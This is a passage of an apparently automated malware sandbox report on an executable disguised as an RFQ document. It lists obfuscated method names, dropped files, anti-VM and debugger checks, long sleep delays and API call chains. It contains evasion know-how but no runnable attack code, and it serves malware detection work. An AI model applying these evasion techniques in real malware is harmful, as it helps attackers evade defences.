              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, EJ3B2yqiiSHLu61dLX.csHigh entropy of concatenated method names: 'yxyCSR0Qsb', 'MPgC2pYkRH', 'vSsCoUglRF', 'lHHCq00SSL', 'uiGCMBy43U', 'EriC4tWKnA', 'mpXCxF0uKD', 'mNlCH6K58k', 'KQgCvmDYnZ', 'Vq3C8jwnsp'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, qbCmH5zDKIPtx7xume.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'w1Zv5W3Qrt', 'psYvMKyDBP', 'puVv4JcpiI', 'xYAvxqg1g0', 'DODvHwYllT', 'QiHvv6KwXr', 'Jp0v8HGS6n'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, sDS4tmjyjBi15csXUB.csHigh entropy of concatenated method names: 'ToString', 'eax4si7DaO', 'NUO4E44t5O', 'Tny4LHVXXK', 'GCu4pxvlEE', 'dTU4hvcTcu', 'oUg4R1CxeH', 'BL54iRb8ZS', 'Xu44Y3bZpN', 'yql4eLWj11'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, sbMIneQI954nk1VNKy.csHigh entropy of concatenated method names: 'pL55o5ULq4', 'FyL5qqsoZZ', 'm5V5W9c8uC', 'FjQ5EtDbs3', 'kBZ5pumEBX', 'R7f5h6DhWS', 'mD55iCkCqF', 'y3v5YIM5CD', 'KVS5uccGlX', 'ppq5slQS24'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, vmE0k9rkQfM22hY723Q.csHigh entropy of concatenated method names: 'a1WvcTBnLA', 'hZuvFeOe6A', 'O7jvf2fqBy', 'fw6vSQQX0I', 'zeBvKUGZFT', 'q0cv20KGJo', 'vv2vJP594r', 'sKMvoAnUB1', 'iAXvqa9j5H', 'fdjvyOfi2L'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, ygnlx19tdmMWkOqBtm.csHigh entropy of concatenated method names: 'qw2x7e3Jv2', 'dojxwpsce8', 'ng5HkGKBWW', 'lpcHrYiEj4', 'G9DxsjSP0P', 'ReHxGMB5gq', 'nuXxQlLh1k', 'LigxtbZ07r', 'T2bxgrIVMq', 'bg4xji458v'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, YHv3HB71eXHZqYirID.csHigh entropy of concatenated method names: 'JLSHPNt0AG', 'ksCHlO9S5g', 'yAGHC8n9eT', 'r46HbxU2v9', 'VepHU3qXUE', 'LysHNG0HFY', 'DswHVTvEPY', 'B0cHAecVgG', 'xoXHTjSAI0', 'Io0HOvL0vT'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, Uh4F0ve7bQdwBRgsoB.csHigh entropy of concatenated method names: 'jJDNcK4XH8', 'lEuNFEMX4Q', 'Qw7NfStig0', 'cC3NSpeDQu', 'PYxNKb7fgR', 'KnXN2nOAG1', 'Dj7NJFqTmT', 'KU2NoqCDj9', 'IPtNqpoOhO', 'mgsNyY0XKp'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, t2wfK1wyNnpsQcBKtw.csHigh entropy of concatenated method names: 'e6jvrlGYxB', 'CQFvBHnQvo', 'P2jvmDiask', 'UlfvPIUZfX', 'CUPvlFLeo0', 'k0QvbKS1gE', 'eJPvUrPkoQ', 'NnwHdmsMAV', 'kwmH7yioSo', 'aFXHD5heZr'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, DqCNrv6DAiDtWMEe1X.csHigh entropy of concatenated method names: 'vhMfnsAw8', 'EbQSDmakD', 'H632Jkh0f', 'RSIJ61DnN', 'Xpjq5ZKFy', 'lUmym00Ti', 'rWa3N7gX5eUqmJAE7v', 'yWqUuddxMFfjCAVjHg', 'SYSHvTO7x', 'DPA8j8wUW'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, QdSQaLrBM9tVlJO1y9W.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HZo8tIZSm6', 'el78gCbYc3', 'bjR8jXLwTW', 'X0Z8a6eLFe', 'Bn780lJLbr', 'DUe89kN1Yl', 'Msk8duIYu0'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, piyy79lLiM1rUZW8Yn.csHigh entropy of concatenated method names: 'Dispose', 'NyWrDxMrcT', 'Mc56EHugMT', 'Umd11PXVL4', 'FDHrwv3HB1', 'NXHrzZqYir', 'ProcessDialogKey', 'wDa6kdDFQh', 'eWh6r6Q9Q2', 'IqO6612wfK'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, BUK7GIrrZ35JJ62Dy5Z.csHigh entropy of concatenated method names: 'ToString', 'YTF8BPZSnM', 'I3J8mCuXk2', 'Bvh8XAv28G', 'dvs8PWIOyN', 'GDk8lYYcNN', 'ba58Cayc5b', 'FwP8b90qVy', 'XZsJYHGCC3Ji2JMmL8b', 'aNoKadG3oEsN6R9NQYL'
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, OoaFmctcsvJ1Rdaqec.csHigh entropy of concatenated method names: 'vLsMu2dZ0Z', 'C3rMGp9Mf5', 'UJTMtLUaYO', 'Kh2MgVOvbX', 'cZRMENo0hp', 'dR8MLBQIls', 'LjqMpetHAu', 'lSpMhZqjQQ', 'U7yMRVpf2x', 'P6IMiPPwWN'
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeJump to dropped file
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VT3g2PdlLRVpwBp[1].exeJump to dropped file
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E74A35
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EF55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00EF55FD
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E933C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E933C7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: xl9lsbb.exe PID: 5268, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeAPI/Special instruction interceptor: Address: E53214
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 7DE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 8FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 7450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: 9FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: AFA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: BFA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: D300000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: E300000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: F300000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: FA00000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeWindow / User API: threadDelayed 4806Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeWindow / User API: threadDelayed 5166Jump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100174
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeAPI coverage: 4.7 %
              Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912Thread sleep count: 4806 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912Thread sleep time: -9612000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912Thread sleep count: 5166 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912Thread sleep time: -10332000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe TID: 2120Thread sleep time: -75000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe TID: 2120Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe TID: 2120Thread sleep count: 36 > 30Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe TID: 2120Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe TID: 3864Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00ED4696
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EDC9C7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDC93C FindFirstFileW,FindClose,0_2_00EDC93C
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF200
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF35D
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDF65E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3A2B
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3D4E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDBF27
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FBBBE0 FindFirstFileW,FindNextFileW,FindClose,3_2_02FBBBE0
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E74AFE
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003380000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4102814338.000000000073F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
              Source: RMActivate_ssp.exe, 00000003.00000002.4108280270.000000000816B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWAnjE
              Source: RMActivate_ssp.exe, 00000003.00000002.4108280270.000000000816B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003380000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: runonce.exe, 0000000F.00000002.4101900693.000000000092A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.3942074178.0000018E42D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 00000008.00000002.2032010505.000001D7FD8EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4104201295.000000000165F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeAPI call chain: ExitProcess graph end nodegraph_0-97375
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025175B3 LdrLoadDll,1_2_025175B3
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE41FD BlockInput,0_2_00EE41FD
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73B4C
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00EA5CCC
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EEC304 LoadLibraryA,GetProcAddress,0_2_00EEC304
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E534E0 mov eax, dword ptr fs:[00000030h]0_2_00E534E0
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E53480 mov eax, dword ptr fs:[00000030h]0_2_00E53480
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E51E70 mov eax, dword ptr fs:[00000030h]0_2_00E51E70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov ecx, dword ptr fs:[00000030h]1_2_03008324
